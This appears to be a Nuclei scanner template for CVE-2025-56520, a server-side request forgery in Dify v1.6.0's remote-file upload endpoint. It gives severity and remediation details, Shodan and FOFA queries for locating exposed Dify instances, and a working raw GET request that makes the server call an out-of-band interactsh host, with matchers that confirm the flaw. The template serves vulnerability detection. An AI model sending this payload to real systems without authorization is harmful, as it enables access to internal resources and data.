Dify v1.6.0 - Server-Side Request Forgery

id: CVE-2025-56520

info:
  name: Dify v1.6.0 - Server-Side Request Forgery
  author: 0x_Akoko
  severity: high
  description: |
    Dify v1.6.0 contains a server side request forgery caused by improper validation in controllers.console.remote_files.RemoteFileUploadApi, letting attackers make arbitrary requests from the server, exploit requires network access.
  impact: |
    Attackers can make arbitrary requests from the server, potentially accessing internal resources or sensitive data.
  remediation: |
    Update to the latest version.
  reference:
    - https://github.com/langgenius/dify
    - https://dify.ai/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
    cvss-score: 9.3
    cve-id: CVE-2025-56520
    epss-score: 0.00133
    epss-percentile: 0.32352
    cwe-id: CWE-918
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.title:"Dify"
    fofa-query: title="Dify"
  tags: cve,cve2025,dify,ssrf,oast,oob,oss,vkev

http:
  - raw:
      - |
        GET /console/api/remote-files/http%3A%2F%2F{{interactsh-url}}%2Ftest HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "file_type"
          - "file_length"
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: word
        part: interactsh_protocol
        words:
          - "http"
          - "dns"
        condition: or

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100a5b1c573130766963b39cfed0b7fb1dc2a28e6753ebdc1935b6602c2598a400b02203fa8679b17b51cdbb24d4228359ee7d878339c9f63ed9359b70b324d51cf9198:922c64590222798bb761d5b6d8e72950